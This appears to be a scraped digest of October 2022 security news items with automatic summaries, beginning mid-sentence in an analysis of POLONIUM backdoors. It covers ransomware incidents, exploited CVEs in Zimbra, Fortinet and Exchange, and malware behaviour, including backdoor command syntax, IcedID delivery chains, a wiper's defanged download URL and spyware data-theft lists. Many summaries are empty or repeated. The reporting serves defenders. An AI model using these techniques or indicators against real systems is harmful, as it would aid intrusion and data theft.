methods from PRLib.dll are called: CHP, which kills running processes with the same name as the backdoor’s executable (i.e., previous executions of the backdoor that are still running), and XVDFv, which implements persistence (in the same way we described for DeepCreep). FlipCreep creates a folder with the username of the target on the FTP server, along with these subfolders: Files : stores files uploaded from the victims : stores files uploaded from the victims orders : stores output from commands executed with cmd.exe Persistence is achieved in the same way as was described for DeepCreep. Other modules To spy on their victims, POLONIUM uses several other modules on top of their backdoors, including reverse shell modules and a module for creating a tunnel.T1082 System Information Discovery TechnoCreep and POLONIUM’s reverse shell module send information such as computer name, username, and operating system to a remote server, in order to identify their victims.The main code for the backdoor was placed in a DLL file, MainZero.dll, and other routines that communicate with Mega were placed in another DLL, MagLibrary.dll.download "<file_name_on_dropbox>" "<local_file_path>" <bool_abs_p> Downloads a file from the root folder in Dropbox to the victim’s computer.Cloud services : The group abuses common cloud services such as Dropbox, OneDrive, and Mega for C&C communications (receive commands and exfiltrate data).On a similar note, they like to divide the code in their backdoors, distributing malicious functionality into various small DLLs, perhaps expecting that defenders or researchers will not observe the complete attack chain. A command to be executed by the backdoor is read from the file cd.txt on the server-side root folder of the victim; once read, the file is deleted from the cloud. FlipCreep FlipCreep is another previously undocumented backdoor written in C# that has a very similar flow of execution as the other backdoors that we have described: it reads commands from orders.txt – a text file stored on an FTP server operated by POLONIUM – and can upload or download files from the server.In some other cases, we have seen a module, coded from scratch, that followed the same logic as some previous components. "What is critical infrastructure? If you ask 5 different people, you may receive 5 different answers. The term critical infrastructure has lost much of its meaning as a differentiator of private entities and currently defines sectors from energy to commercial facilities. Bob Kolasky, SVP for Critical Infrastructure at Exiger, previously served as Assistant Director for Cybersecurity and Infrastructure Security Agency (CISA), and in this Help Net Security interview talks about protecting critical infrastructure, the importance … More
The post Lack of transparency, systemic risks weaken national cybersecurity preparedness appeared first on Help Net Security.
"Autosummary:
Bob Kolasky, SVP for Critical Infrastructure at Exiger, previously served as Assistant Director for Cybersecurity and Infrastructure Security Agency (CISA), and in this Help Net Security interview talks about protecting critical infrastructure, the importance of information-sharing, national cybersecurity preparedness, and more. The United States defines critical infrastructure as the “systems and assets, whether physical or virtual, so vital to the United States that the incapacity or destruction of such systems and assets would have a debilitating impact on security, national economic security, national public health or safety, or any combination of those matters.” "Threat actors got to a database with over 152,000 customer records before its owner, the Turkish branch of Harvard Business Review, closed it. Crooks left a ransom note, threatening to leak the data and inform authorities of the EU’s General Data Protection Regulation (GDPR) violations. Original Post published on CyberNews A recent discovery by the […]
The post Harvard Business Publishing licensee hit by ransomware appeared first on Security Affairs.
"Autosummary:
In total, the database leaked over 152,000 pieces of information pertaining to customers, such as emails, names, links to LinkedIn, Twitter, and Facebook profiles, and hashed passwords. “Exposing sensitive data or allowing it to get into the wrong hands can have a cascading effect, leading to regulatory and compliance fines, potential lawsuits and legal fines, reputational damage including lost customer confidence, and a financial impact including lost business,” Neclerio said. The database index marked “Users” contained over 152,000 entries: names, emails, links to social media profiles, and passwords, some of which were hashed using a very weak MD5 algorithm. "A still unpatched vulnerability (CVE-2022-41352) in Zimbra Collaboration is being exploited by attackers to achieve remote code execution on vulnerable servers. About the vulnerability Zimbra Collaboration (formerly Zimbra Collaboration Suite) is cloud-hosted collaboration software suite that also includes an email server component and a web client component. CVE-2022-41352 exists due to Zimbra’s Amavis antivirus engine using the cpio method to scan inbound emails. “CVE-2022-41352 is effectively identical to CVE-2022-30333 but leverages a different file format … More
The post Unpatched Zimbra RCE bug exploited by attackers (CVE-2022-41352) appeared first on Help Net Security.
"Autosummary:
Security-wise, this has been a bad year for Zimbra and its users: as documented in this CISA alert, five other vulnerabilities have been exploited by attackers since the beginning of the year, and now CVE-2022-41352. "Autosummary:
The complete list of Fortinet vulnerable products exposed to attacks attempting to exploit the CVE-2022-40 flaw if left unpatched includes: FortiOS : 7.2.1, 7.2.0, 7.0.6, 7.0.5, 7.0.4, 7.0.3, 7.0.2, 7.0.1, 7.0.0 FortiProxy : 7.2.0, 7.0.6, 7.0.5, 7.0.4, 7.0.3, 7.0.2, 7.0.1, 7.0.0 FortiSwitchManager : 7.2.0, 7.0.0 Fortinet released security patches last week and asked customers to update vulnerable devices to FortiOS 7.0.7 or 7.2.2 and above, FortiProxy 7.0.7 or 7.2.1 and above, and FortiSwitchManager 7.2.1 or above to defend their devices from attacks. "Autosummary:
Caffeine"s main dashboard (Mandiant) Next, the operators must purchase a subscription license, which costs $250 per month, $450 for three months, or $850 for six months, depending on the features. "Autosummary:
Diversifying the delivery chain Between September 13 and 21, Cymru analysts noticed the following different delivery methods of IcedID on targets: Password Protected ZIP -> ISO -> LNK -> JS -> [CMD or BAT] -> DLL Password Protected ZIP -> ISO -> CHM -> DLL Password Protected ZIP -> ISO -> LNK -> BAT -> DLL Malicious Word or Excel documents laced with macros Delivered directly via the PrivateLoader pay-per-install service These campaigns used either the Italian language or English, with the former having smaller-scale success than the latter. "Fortinet has confirmed that the recently disclosed critical authentication bypass issue (CVE-2022-40684) is being exploited in the wild. Last week, Fortinet addressed a critical authentication bypass flaw, tracked as CVE-2022-40684, that impacted FortiGate firewalls and FortiProxy web proxies. An attacker can exploit the vulnerability to log into vulnerable devices. “An authentication bypass using an alternate […]
The post CVE-2022-40684 flaw in Fortinet products is being exploited in the wild appeared first on Security Affairs.
"Autosummary:
Last week, Fortinet addressed a critical authentication bypass flaw, tracked as CVE-2022-40684, that impacted FortiGate firewalls and FortiProxy web proxies. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: MS Exchange zero-days: The calm before the storm? CVE-2022-41040 and CVE-2022-41082, the two exploited MS Exchange zero-days that still have no official fix, have been added to CISA’s Known Exploited Vulnerabilities (KEV) Catalog. October 2022 Patch Tuesday forecast: Looking for treats, not more tricks We’ve entered the final quarter of 2022 with a favorite holiday for many – Halloween, at … More
The post Week in review: 7 cybersecurity audiobooks to read, Patch Tuesday forecast appeared first on Help Net Security.
"Autosummary:
Infosec products of the month: September 2022 Here’s a look at the most interesting products from the past month, featuring releases from: 42Crunch, Avetta, Cloudflare, Code42, Commvault, D3 Security, Illumio, Kingston Digital, Malwarebytes, Netography, novoShield, Onfido, Socure, TransUnion, and Truecaller. New infosec products of the week: October 7, 2022 Here’s a look at the most interesting products from the past week, featuring releases from HashiCorp, Legit Security, LiveAction, LogRhythm, Pentest People, and Verica. APIs are quickly becoming the most popular attack vector In this Help Net Security video, Shay Levi, CTO at Noname Security, discusses the findings from a recent API security report, which reveals a growing number of API security incidents, a concerning lack of API visibility, and a level of misplaced confidence in existing controls. "CommonSpirit, one of the largest hospital chains in the US, suffered a ransomware cyberattack that impacted its operations. Common Spirit, one of the largest hospital chains in the US, this week suffered a ransomware cyberattack that caused severe inconvenience to the facilities and to patients The alleged security breach led to delayed surgeries, hold-ups in […]
The post CommonSpirit hospital chains hit by ransomware, patients are facing problems appeared first on Security Affairs.
"Autosummary:
Common Spirit, one of the largest hospital chains in the US, this week suffered a ransomware cyberattack that caused severe inconvenience to the facilities and to patients The alleged security breach led to delayed surgeries, hold-ups in patient care and forced the chain to reschedule doctor appointments across the country. "Autosummary:
windll32.exe malware installed on Windows Source: BleepingComputer According to VirusTotal, the windll32.exe file is a password-stealing malware that attempts to steal browser information, such as history, cookies, and passwords, as well as SSH keys and other information. "Autosummary:
The drive wiper"s code (Cyble) Finally, the malware executes "open.exe," which drops and runs "open.bat," which, in turn, connects to the URL "hxxps[:]//lllllllllll.loseyourip[.]com/downloads" and then opens the ransom note. "Everest ransomware operators claimed to have hacked South Africa state-owned company ESKOM Hld SOC Ltd. In March 2022, the Everest ransomware operators published a notice announcing the sale of “South Africa Electricity company’s root access” for $125,000. Eskom transforms inputs from the natural environment – coal, nuclear, fuel, diesel, water, and wind – into more […]
The post Everest gang demands $200K for data stolen from South Africa state-owned electricity company ESKOM appeared first on Security Affairs.
"Autosummary:
pic.twitter.com/JQefRtF9Oj — DarkTracer : DarkWeb Criminal Intelligence (@darktracer_int) March 18, 2022 Eskom transforms inputs from the natural environment – coal, nuclear, fuel, diesel, water, and wind – into more than 90% of the energy supplied to a wide range of customers in South Africa and the Southern African Development Community (SADC) region. "Autosummary:
windll32.exe malware installed on Windows Source: BleepingComputer According to VirusTotal, the windll32.exe file is a password-stealing malware that attempts to steal browser information, such as history, cookies, and passwords, as well as SSH keys and other information. "Semtech has announced that CWD Limited has developed a dual combo module incorporating Semtech’s LoRa Connect platform and the LoRaWAN standard connectivity as well as Bluetooth Low Energy (BLE) to optimize high data rate, long range wireless communication for IoT device connectivity. The CWD CBTLRM02 dual combo module is utilized in smart utility meters and wearables with Semtech’s LoRa Connect (SX1262) System on Chip (SoC) for communication in the 150MHz to 960MHz bands for LoRa … More
The post Semtech’s LoRa Connect optimizes CWD Limited’s dual combo module for IoT device connectivity appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The vulnerability, which is present in versions 8.8.15 and 9.0 of the software, affects several Linux distributions such as Oracle Linux 8, Red Hat Enterprise Linux 8, Rocky Linux 8, and CentOS 8, with the exception of Ubuntu due to the fact that pax is already installed by default. "Threat actors are exploiting an unpatched severe remote code execution vulnerability in the Zimbra collaboration platform. Researchers from Rapid7 are warning of the exploitation of unpatched zero-day remote code execution vulnerability, tracked as CVE-2022-41352, in the Zimbra Collaboration Suite. Rapid7 has published technical details, including a proof-of-concept (PoC) code and indicators of compromise (IoCs) regarding […]
The post Unpatched remote code execution flaw in Zimbra Collaboration Suite actively exploited appeared first on Security Affairs.
"Autosummary:
Oracle Linux 8 Vulnerable Red Hat Enterprise Linux 8 Vulnerable Rocky Linux 8 Vulnerable CentOS 8 Vulnerable Ubuntu 20.04 Not vulnerable (pax is installed by default) Ubuntu 18.04 Not vulnerable (pax is installed, cpio has Ubuntu’s custom patch) Zimbra is going to address it by removing the dependency on cpio by making pax a prerequisite for Zimbra Collaboration Suite.“If the pax package is not installed, Amavis will fall-back to using cpio, unfortunately the fall-back is implemented poorly (by Amavis) and will allow an unauthenticated attacker to create and overwrite files on the Zimbra server, including the Zimbra webroot. "The BlackByte ransomware operators are leveraging a flaw in a legitimate Windows driver to bypass security solutions. Researchers from Sophos warn that BlackByte ransomware operators are using a bring your own vulnerable driver (BYOVD) attack to bypass security products. In BYOVD attacks, threat actors abuse vulnerabilities in legitimate, signed drivers, on which security products rely, […]
The post BlackByte Ransomware abuses vulnerable driver to bypass security solutions appeared first on Security Affairs.
"Autosummary:
“Bring Your Own Driver” is the name given to this technique [1, 2, 3, 4, 5, 6] — exploiting a targeted system by abusing a legitimate signed driver with an exploitable vulnerability.” "Autosummary:
" Comparing the timestamps on the data shared by RansomHouse with the data leaked by Ragnar Locker in June 2021, both sets of stolen data have similar timestamps, with no file being newer than May 2021. "Autosummary:
New social engineering tricks The social engineering process has changed in recent callback phishing campaigns, although the bait in the phishing email remains the same, an invoice for a payment made to Geek Squad, Norton, McAfee, PayPal, or Microsoft. "On a mission to enable secure and trusted crypto transactions, Notabene launched SafePII, an end-to-end Encrypted Escrow Service for personally identifiable information (PII), created explicitly for Travel Rule compliant transfers. This launch is the latest addition to Notabene’s comprehensive bank-grade protection solution and elevates its continued commitment to privacy and security in protecting consumer data at the highest level. SafePII facilitates the secure exchange of PII data by encrypting the data format between parties, eliminating … More
The post Notabene SafePII prevents phishing attacks in sensitive compliance systems appeared first on Help Net Security.
"Autosummary:
On a mission to enable secure and trusted crypto transactions, Notabene launched SafePII, an end-to-end Encrypted Escrow Service for personally identifiable information (PII), created explicitly for Travel Rule compliant transfers. "Veratad announced the unveiling of “Veratad VX” – a new global age and identity verification platform designed to deliver a no-code journey orchestration and automated verification experience. The new VX orchestration platform is an extension of Veratad’s proven core technology, IDresponse, that currently synthesizes dozens of providers and verification methods allowing clients access them through a single API integration. Veratad VX business users can now create sophisticated, multi-touch customer verification workflows without touching a line … More
The post Veratad VX improves identity verification and analytics for business users appeared first on Help Net Security.
"Autosummary:
"Phosphorus announced important new enhancements to its Enterprise xIoT Security Platform that will improve organizations’ ability to reduce their xIoT attack surface and prevent sophisticated threats. “The proliferation of xIoT devices is creating vast new risks for today’s enterprises, with attackers increasingly able to evade defenses and breach companies through these overlooked and often unmonitored devices,” said Sonu Shankar, VP of Product Management at Phosphorus. “Our xIoT security platform already provides unmatched capabilities for finding, … More
The post Phosphorus enhances its xIoT security platform to strengthen enterprise device security appeared first on Help Net Security.
"Autosummary:
Phosphorus’s Enterprise xIoT Security Platform is a consolidated xIoT security offering, delivering Attack Surface Management, Hardening and Remediation, and Detection and Response across the full range of IoT, OT, and Network-connected devices—spanning both new and legacy devices. "How do you best spend a cybersecurity budget you have long been hoping you’d get? That’s the question state, local, and territorial (SLT) governments are starting to ask themselves in the wake of a major September announcement from the Department of Homeland Security. DHS will be doling out $1 billion in funding over the next four years as part of a first-of-its-kind cybersecurity grant program specifically aimed at SLT governments. The Cybersecurity and Infrastructure Security … More
The post What $1B in cybersecurity funding can mean for US state, local governments appeared first on Help Net Security.
"Autosummary:
The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Emergency Management Agency (FEMA) are jointly managing the grants, and CISA has laid out the overarching goals for the funding: Implement cyber governance and planning Assess and evaluate systems and capabilities Mitigate prioritized issues, and Build a cybersecurity workforce While the designated State Administrative Agency (SAA) for each state and territory is the only entity eligible to apply for funding (this fact sheet does a great job of summarizing what you need to know), the legislation requires states to distribute at least 80% of funds to local governments, with a minimum of 25% of the allocated funds distributed to rural areas.After decades of experience in IT security, networking, and compliance (I helped found the Symantec State Local and Education division), I’d say start here: Identify what is aging and vulnerable Know your gaps and design a road map around them Your list of potential projects is probably going to be a long one, so prioritization is key Sometimes understanding the company you find yourself in can help. "Researchers linked the threat actor behind the Eternity malware-as-a-service (MaaS) to a new malware strain called LilithBot. Zscaler researchers linked a recently discovered sample of a new malware called LilithBot to the Eternity group (aka EternityTeam; Eternity Project). The Eternity group operates a homonymous malware-as-a-service (MaaS), it is linked to the Russian “Jester Group,” which is […]
The post LilithBot Malware, a new MaaS offered by the Eternity Group appeared first on Security Affairs.
"Autosummary:
“Eternity uses an as-a-service subscription model to distribute different Eternity-branded malware modules in underground forums, including a stealer, miner, botnet, ransomware, worm+dropper, and DDoS bot.” "Autosummary:
"Autosummary:
"Autosummary:
"If the pax package is not installed, Amavis will fall-back to using cpio, unfortunately the fall-back is implemented poorly (by Amavis) and will allow an unauthenticated attacker to create and overwrite files on the Zimbra server, including the Zimbra webroot," warned the September security advisory. "Autosummary:
"Autosummary:
With an integrated approach, organizations will: Increase efficiencies Enhance security posture Tell better security stories Improve visibility across the board Increase support from leadership Avoid compliance/regulatory fines IT and security teams set the tone for the entire company Hand in hand toward a lower-risk future Empowering cybersecurity through GRC – methodology The OCEG has developed this Capability Model (Red Book) as an open-source methodology that merges the sub-disciplines of governance, risk, audit, compliance, ethics/culture, and IT into a unified approach. In summary: A well-planned GRC program enables organizations to: Collect and maintain high-quality information Improve decision making Promote collaboration Increase accountability Build a strong culture Increase efficiency and agility Provide visibility Reduces costs by supporting suitable investments Increase integration Protect the company"s value and reputation GRC and Cybersecurity: Why do companies need an integrated approach?Also, organizations might use this GRC Capability Model with more specific functional frameworks, such as: ISO, COSO, ISACA, IIA, NIST, and others. As a process, it would look like this: Learning business plans and goals Understanding strategic objectives Being aware of the current and future compliance activities Connecting with the key stakeholders 2. Understanding the principles of GRC Governance, Risk, and Compliance (GRC) is a business strategy for managing a company"s overall governance, enterprise risk management, and regulatory compliance. "Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @DanielGallagher, @malwrhunterteam, @demonslay335, @malwareforme, @Seifreed, @billtoulas, @jorntvdw, @serghei, @fwosar, @FourOctets, @BleepinComputer, @struppigel, @Ionut_Ilascu, @VK_Intel, @LawrenceAbrams, @PolarToffee, @Avast, @Sophos, @sygnia_labs, @BrettCallow, @pcrisk, @jgreigj, @lorenzofb, and @elhackernet. "VMware this week addressed a severe vulnerability in vCenter Server that could lead to arbitrary code execution. VMware on Thursday released security patches to address a code execution vulnerability, tracked as CVE-2022-31680 (CVSS score of 7.2), in vCenter Server. The security issue is an unsafe deserialization vulnerability that resides in the platform services controller (PSC). […]
The post VMware fixed a high-severity bug in vCenter Server appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Categories: News Tags: Scam Tags: spam Tags: phish Tags: BEC Tags: business email compromise Tags: romance Tags: fake Tags: fraud Tags: wire Tags: money mule We take a look at a scammer, involved in both BEC fraud and romance scams, who has been jailed for a whopping 25 years. |
The post Romance scammer given 25 years of alone time appeared first on Malwarebytes Labs.
"Autosummary:
Posted: October 7, 2022 by We take a look at a scammer, involved in both BEC fraud and romance scams, who has been jailed for a whopping 25 years.Once the fraud proceeds were posted to his accounts, Ogiekpolor laundered the funds, including wiring hundreds of thousands of dollars to overseas accounts, and withdrawing substantial amounts in cash and cashier’s checks. "Categories: Business We"ve updated our bug bounty program with increased rewards and a new way to submit vulnerabilities |
The post Malwarebytes" modernized bug bounty program—here"s all you need to know appeared first on Malwarebytes Labs.
"Autosummary:
Severity Reward scale Critical $2,000-$5,000 High $500-$2,000 Medium $100-$500 Low $20-$100 Submitting a vulnerability report To ease the complex bug bounty process, we rely on HackerOne, which provides an interface between researchers and our security team. "Pradeo, a global leader in mobile fleet and application security enters into exclusive negotiations for the acquisition of Yagaan, an application security software company based in France. Thus, the mobile security leader is strengthening his path towards unifying cybersecurity services by providing comprehensive expertise and solutions in the fast-growing mobile security market. In 2021, the global mobile security market was valued at $3.96 billion and the global application security market was valued at $6.95 billion, … More
The post Pradeo acquires Yagaan, strengthens its cybersecurity services unification strategy appeared first on Help Net Security.
"Autosummary:
Pradeo’s objective is to become the sole contact for CISOs, application developers, auditors, device manufacturers and other cybersecurity stakeholders for all issues related to the protection of mobile applications and associated web services, as well as smartphones and tablets. "Shield launched surveillance capabilities that enable banks and finance firms to bring communication compliance into the control room and protect against data leaks. InfoBarriers, the company’s newest AI-model, is included in the latest version of Shield (3.2), which introduces additional new and substantial capabilities unmatched by existing legacy vendors and emerging startups. Also included in Shield 3.2 are enhanced search analytics, case workspaces for more visibility and traceability into eDiscovery, and further refinements to user … More
The post Shield InfoBarriers protects banks and finance firms against data leakage appeared first on Help Net Security.
"Autosummary:
All combined, InfoBarriers, enhanced search analytics, data visualization capabilities, and Shield’s user interface upgrades that are included in Shield 3.2 empowers firms to bring surveillance into the control room. "Recently, Eileen Walther, Northwave’s Country Manager for Germany and specialized in information security, was elected the new Vice President of the Cyber Security Council Germany (Cyber-Sicherheitsrat Deutschland). Before joining Northwave, she was head of the Dutch High Tech Crime Team and strategic advisor at the German Federal Criminal Police Office (BKA – Bundeskriminalambt). The Cyber Security Council Germany was founded in August 2012. The Berlin-based association is politically neutral and advises companies, authorities and political … More
The post Fine-tuning Germany’s cybersecurity strategy appeared first on Help Net Security.
"Autosummary:
Moreover, on a national level, I believe that Germany should keep on joining forces with other EU member states that are leading in cybersecurity, such as the Netherlands, and dare to establish itself as an international pioneer. In this interview with Help Net Security, Walther talks about Germany’s cybersecurity future, working on information security strategy, and more.Recently, Eileen Walther, Northwave’s Country Manager for Germany and specialized in information security, was elected the new Vice President of the Cyber Security Council Germany (Cyber-Sicherheitsrat Deutschland). "Joe Sullivan, the former Chief Security Officer (CSO) of Uber, has been convicted of obstruction of proceedings of the Federal Trade Commission and misprision of felony in connection with the attempted cover-up of the hack Uber suffered in 2016. The conviction Sullivan was named Chief Security Officer at Uber in April 2015. “At that time, Uber had recently disclosed to the FTC that it had been the victim of a data breach in 2014,” the … More
The post Former Uber CSO convicted for concealing data breach, theft from the authorities appeared first on Help Net Security.
"Autosummary:
According to the DoJ, “The evidence showed that, despite knowing in great detail that Uber had suffered another data breach directly responsive to the FTC’s inquiry, Sullivan continued to work with the Uber lawyers handling or overseeing that inquiry, including the General Counsel of Uber, and never mentioned the incident to them.” "Researchers at cybersecurity firm Resecurity spotted a new group of hacktivists targeting financial institutions in Egypt, Resecurity, a California-based cybersecurity company protecting Fortune 500 corporations globally, has noticed a new group of hacktivists targeting financial institutions in Egypt. The bad actors go under the campaign “EG Leaks” (also known as “Egypt Leaks”), they started leaking […]
The post “Egypt Leaks” – Hacktivists are Leaking Financial Data appeared first on Security Affairs.
"Autosummary:
The geography of the affected banking clients is primarily centered in Cairo (70%), but includes Alexandria (12%), Aswan (8%), Giza (7%), Sohag (2%), Luxor (1%) and other major cities. "Autosummary:
Meanwhile, the release of mainline version 6.0 was announced by Linus Torvalds on Sunday, bringing support for Arc GPUs, AMD RDNA 3, and Intel "Raptor Lake," performance-boosting scheduler changes for Intel Xeon and AMD EPYC chips, energy tweaks, and more. "Autosummary:
"Autosummary:
This past July, Uber also settled with the DoJ to pay $148 million and agreed to "implement a corporate integrity program, specific data security safeguards, and incident response and data breach notification plans, along with biennial assessments. "Cisco fixed high-severity flaws in some of its networking and communications products, including Enterprise NFV, Expressway and TelePresence. Cisco announced it has addressed high-severity vulnerabilities affecting some of its networking and communications products, including Enterprise NFV, Expressway and TelePresence. “Multiple vulnerabilities in the API and in the web-based management interface of Cisco Expressway Series Software […]
The post Cisco fixed two high-severity bugs in Communications, Networking Products appeared first on Security Affairs.
"Autosummary:
The first vulnerability, tracked as CVE-2022-20814, is an improper certificate validation issue, a remote, unauthenticated attacker can trigger it to access sensitive data through a man-in-the-middle attack. "The City of Tucson, Arizona disclosed a data breach, the incident was discovered in May 2022 and impacted 123,500 individuals. The security breach was discovered at the end of May 2022 and concluded the investigation in September. According to the notification letter sample provided to the Maine Attorney General’s Office, over 123,500 were impacted have been impacted […]
The post City of Tucson Data Breach impacted 123,500 individuals appeared first on Security Affairs.
"Autosummary:
“The City is providing individuals with information on how to place a fraud alert and security freeze on one’s credit, the contact details for the national consumer reporting agencies, information on how to obtain a free credit report, a reminder to remain vigilant for incidents of fraud and identity theft by reviewing account statements and monitoring free credit reports, and encouragement to contact the Federal Trade Commission, their state Attorney General, and law enforcement to report attempted or actual identity theft and fraud.” "Autosummary:
"This joint CSA builds on previous NSA, CISA, and FBI reporting to inform federal and state, local, tribal and territorial (SLTT) government; critical infrastructure, including the Defense Industrial Base Sector; and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs). "This joint Cybersecurity Advisory (CSA) provides the top Common Vulnerabilities and Exposures (CVEs) used since 2020 by People’s Republic of China (PRC) state-sponsored cyber actors as assessed by the National Security Agency (NSA), Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI). PRC state-sponsored cyber actors continue to exploit known vulnerabilities to actively target U.S. and allied networks as well as software and hardware companies to steal intellectual property and develop access into sensitive networks.
This joint CSA builds on previous NSA, CISA, and FBI reporting to inform federal and state, local, tribal and territorial (SLTT) government; critical infrastructure, including the Defense Industrial Base Sector; and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs).
NSA, CISA, and FBI urge U.S. and allied governments, critical infrastructure, and private sector organizations to apply the recommendations listed in the Mitigations section and Appendix A to increase their defensive posture and reduce the threat of compromise from PRC state-sponsored malicious cyber actors.
For more information on PRC state-sponsored malicious cyber activity, see CISA’s China Cyber Threat Overview and Advisories webpage, FBI’s Industry Alerts, and NSA’s Cybersecurity Advisories & Guidance.
Download the PDF version of this report: pdf, 409 KB
NSA, CISA, and FBI continue to assess PRC state-sponsored cyber activities as being one of the largest and most dynamic threats to U.S. government and civilian networks. PRC state-sponsored cybe "
Autosummary:
"Autosummary:
"Autosummary:
"Healthy habits that are instilled and nurtured at an early age bring lifelong benefits – the same applies to good cybersecurity habits
The post The need to change cybersecurity for the next generation appeared first on WeLiveSecurity
"Autosummary:
Whether the issue is trolling, cyberbullying, fraud, identity theft, grooming, credential theft, or one of the many other variants of cyberthreats, there are likely to be consequences – mental health consequences that are hidden from visual identification.Healthy habits that are instilled and nurtured at an early age bring lifelong benefits – the same applies to good cybersecurity habits It’s October, it’s Cybersecurity Awareness Month (CSAM), and with it the annual deluge of articles about phishing, passwords, protecting personal data and such like that will be hitting your inboxes very soon (if they have not already landed). "Oort announced the completion of a $15 million funding round, including both Seed and Series A investments. Oort will use the funds to grow and further accelerate its go-to-market (GTM) strategy. The funding round was co-led by .406 Ventures, a Boston-based early-stage venture capital firm specializing in cybersecurity, as well as Energy Impact Partners (EIP), a New York-based global investment platform, and included Cisco Investments. They join existing investors including 645 Ventures, Bain Capital Ventures … More
The post Oort raises $15 million to defend enterprises against identity-based cyberattacks appeared first on Help Net Security.
"Autosummary:
The funding round was co-led by .406 Ventures, a Boston-based early-stage venture capital firm specializing in cybersecurity, as well as Energy Impact Partners (EIP), a New York-based global investment platform, and included Cisco Investments. “With the increasing cyber risks to enterprises today, we know that an identity-first solution is critical to every security strategy,” said Shawn Cherian, partner, EIP. "A bug in Linux Kernel 5.19.12 that was released at the end of September 2022 can potentially damage the displays of Intel laptops. Linux users reported the displays of their Intel laptops rapidly blinking, flickering, and showing white flashes after upgrading to Linux kernel version 5.19.12. Linux expert Ville Syrjäl pointed out that the anomalous […]
The post Watch out, a bug in Linux Kernel 5.19.12 can damage displays on Intel laptops appeared first on Security Affairs.
"Autosummary:
Linux users reported the displays of their Intel laptops rapidly blinking, flickering, and showing white flashes after upgrading to Linux kernel version 5.19.12. "Categories: News Tags: BOD 23-01 Tags: asset visibility Tags: vulnerability detection Tags: federal networks Tags: CISA Tags: CDM Tags: CISA has issued BOD 23-10 which requires all FCEB entities to maintain an inventory of all IPv4- and IPv6-networked assets, perform regular, periodic scans of these devices, and provide this information to CISA. |
The post BOD 23-01: Improving asset visibility and vulnerability detection on federal networks appeared first on Malwarebytes Labs.
"Autosummary:
Posted: October 6, 2022 by CISA has issued BOD 23-10 which requires all FCEB entities to maintain an inventory of all IPv4- and IPv6-networked assets, perform regular, periodic scans of these devices, and provide this information to CISA. "The internet constantly changes as new technologies are developed, and vulnerabilities are discovered. At the same time, organizations expand their operations that interact with the Internet. In this Help Net Security video, Emily Austin, Security Data Scientist at Censys, illustrates how assessing the state of the internet is essential for determining the risks and exposures that a company faces.
The post Assessing the state of the internet to make smart security decisions appeared first on Help Net Security.
"Autosummary:
"Audiobooks have gained enormous popularity among book lovers for a variety of factors, including their convenience, which enables listeners to learn while running errands or traveling. Here’s a list of cybersecurity audiobooks that are worthy of your time. Cybersecurity: The Insights You Need from Harvard Business Review Author: Harvard Business Review This book brings you today’s most essential thinking on cybersecurity, from outlining the challenges to exploring the solutions, and provides you with the critical … More
The post 7 cybersecurity audiobooks you should listen to this year appeared first on Help Net Security.
"Autosummary:
They’ll also find: Concrete strategies for aligning your security practices with the business Common myths and pitfalls when implementing Zero Trust and how to implement it in a cloud environment Strategies for preventing breaches that encourage efficiency and cost reduction in your company’s security practices Project Zero Trust is an ideal resource for aspiring technology professionals, as well as experienced IT leaders, network engineers, system admins, and project managers who are interested in or expected to implement zero-trust initiatives.From understanding the need, to core risk management principles, to threats, tools, roles, and responsibilities, this book walks the listener through each step of developing and implementing a cybersecurity program. "Autosummary:
"Autosummary:
"Autosummary:
Improved URL Rewrite rule Reported privately to Microsoft three weeks ago, CVE-2022-41040 is a server-side request forgery (SSRF) that enables privilege escalation and works with CVE-2022-41082 to trigger remote code execution on on-premise Exchange server deployments. "Autosummary:
Basic device information (model, brand, buildID, Android version) Device MAC address Contact list SMS Call logs Account names and permissions Installed applications list and permissions Clipboard data GPS location data SIM information (number, country, IMEI, state) File list File contents Moreover, RatMilad can perform file actions such as deleting files and stealing files, modifying the permissions of the installed app, or even using the device"s microphone to record audio and eavesdrop on the room. "A new directive issued by the Cybersecurity and Infrastructure Security Agency (CISA) is ordering US federal civilian agencies to perform regular asset discovery and vulnerability enumeration, to better account for and protect the devices that reside on their networks. About the Directive “Over the past several years, CISA has been working urgently to gain greater visibility into risks facing federal civilian networks, a gap made clear by the intrusion campaign targeting SolarWinds devices,” the agency … More
The post CISA orders federal agencies to regularly perform IT asset discovery, vulnerability enumeration appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Bad news for the Australian telecommunications industry, the largest company in the country Telstra suffered a data breach. Australia’s largest telecommunications company Telstra disclosed a data breach through a third-party supplier. The company pointed out that its systems have not been breached, the security breach impacted a third-party supplier that previously provided a now-obsolete Telstra […]
The post Telstra Telecom discloses data breach impacting former and current employees appeared first on Security Affairs.
"Autosummary:
Here are the key facts: 👉 This wasn"t a breach of any Telstra system 👉 No customer account info was included 👉 The data includes first/last names and employee email addresses 👉 The data is from 2017 — Telstra (@Telstra) October 4, 2022 Data leaked online was from 2017, it includes the names (first and last) and email addresses used to sign up for the employee rewards program. "Autosummary:
Chase UK"s current account MasterCard bears no 16-digit number (BleepingComputer) While Chase UK"s current account customers are offered a physical debit card with a very real chip and a magnetic strip for in-person purchases, the card itself bears no visible 16-digit number, or the expiration date and CVV—all of which are available only via the mobile app. Chase Bank UK"s mobile-based Current Account app down Several users also reported issues when attempting to log into the app or access their card number, which can be seen solely from within the mobile app. "Autosummary:
These variants include the following extensions and strings appended/prepended to an encrypted file"s name: .MafiaWare666 .jcrypt .brutusptCrypt .bmcrypt .cyberone .l33ch If you were affected by one of these variants, you can download the free decryptor from here, run the executable, select the drive that holds the encrypted files, and point the tool to a sample pair of encrypted and original files. "Autosummary:
"Autosummary:
“When enabled, Maggie redirects any incoming connection (on any port the MSSQL server is listening on) to a previously set IP and port, if the source IP address matches a user-specified IP mask” - DCSO CyTec “The implementation enables port reuse, making the redirection transparent to authorized users, while any other connecting IP is able to use the server without any interference or knowledge of Maggie,” the researchers added. "Autosummary:
As for what people can do to protect themselves from potential attempts of election-related fraud, the FBI has issued the following recommendations: Use official state and local government portals to source information about voter registration, polling locations, voting by mail, provisional ballot process, and final election results. "Autosummary:
